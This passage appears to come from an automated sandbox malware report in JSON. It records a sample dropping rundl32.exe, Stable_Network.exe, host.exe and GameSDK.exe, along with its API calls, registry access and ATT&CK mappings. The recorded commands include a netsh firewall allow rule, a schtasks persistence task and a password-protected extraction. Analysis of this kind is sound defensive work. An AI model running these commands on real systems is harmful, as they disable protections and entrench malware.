%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter AdvApi32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\ce3c98f2bf220ef17b0cf4233cac6ceb\\System.Drawing.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\367e5b8a038ac76eba17528bb7b3688e\\System.Windows.Forms.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter shfolder.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\ad8dd536906e94c4bc9cb9b82285580b\\System.Configuration.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\77c1dc46ea139bf5e1eaa9b87ef03c7a\\System.Xml.ni.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00003876)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003972)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\schtasks.exe (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000468)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000468)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006040)\n \"rundl32.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006060)\n \"rundl32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006060)\n \"host.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006136)\n \"host.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006136)\n \"host.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" at 64740000\n \"rundl32.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 623D0000\n \"host.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" at 64740000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" at 5FBB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\rundl32.exe\"\" - (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\Stable_Network.exe\"\" - (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\host.exe\"\" - (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\system.dll.exe\"\" - (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateProcessW\" with parameter \"dw20.exe -x -s 836\" - (UID: 00000000-00006040)\n \"Stable_Network.exe\" called \"CreateProcessW\" with parameter \"%TEMP%\\CL_Debug_Log.txt e -p\"JDQJndnqwdnqw2139dn21n3b312idDQDB\" \"%TEMP%\\\" - (UID: 00000000-00006124), \"Stable_Network.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\cmd.exe /c schtasks.exe /Create /XML \"%TEMP%\\SystemCheck.xml\" /TN \"System\\SystemC\" - (UID: 00000000-00006124)\n \"host.exe\" called \"CreateProcessW\" with parameter \"\"%ALLUSERSPROFILE%\\GameSDK.exe\"\" - (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"CreateProcessW\" with parameter \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\GameSDK.exe\" \"GameSDK.exe\" ENABLE\" - (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75510000\n \"rundl32.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75510000\n \"rundl32.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 750D0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75510000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 750D0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75510000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 750D0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"host.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"dw20.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"CL_Debug_Log.txt\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000\n \"schtasks.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\1VeDwfujGeaxOsgJ\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"1VeDwfujGeaxOsgJ\"\n \"\\Sessions\\1\\BaseNamedObjects\\QPRZ3bWvXh\"\n \"QPRZ3bWvXh\"\n \"\\Sessions\\1\\BaseNamedObjects\\5b4af3576e30808651ae14fbef1ee719\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"rundl32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundl32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"rundl32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")\n \"host.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"host.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"GameSDK.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"GameSDK.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")\n \"Stable_Network.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\")\n \"Stable_Network.exe\" touched \"Wbem Scripting Object Path\" (Path: \"HKCU\\CLSID\\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\")\n \"Stable_Network.exe\" touched \"WBEM Locator\" (Path: \"HKCU\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\")\n \"Stable_Network.exe\" touched \"WbemDefaultPathParser\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\")\n \"Stable_Network.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"Stable_Network.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"Stable_Network.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"Stable_Network.exe\" touched \"WbemStatusCode\" (Path: \"HKCU\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\TREATAS\")\n \"Stable_Network.exe\" touched \"WinHttpRequest Component version 5.1\" (Path: \"HKCU\\CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}\\TREATAS\")\n \"Stable_Network.exe\" touched \"Multi Language Support\" (Path: \"HKCU\\CLSID\\{275C23E2-3747-11D0-9FEA-00AA003F8646}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"rundl32.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63030000\n \"rundl32.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 637E0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"Stable_Network.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n 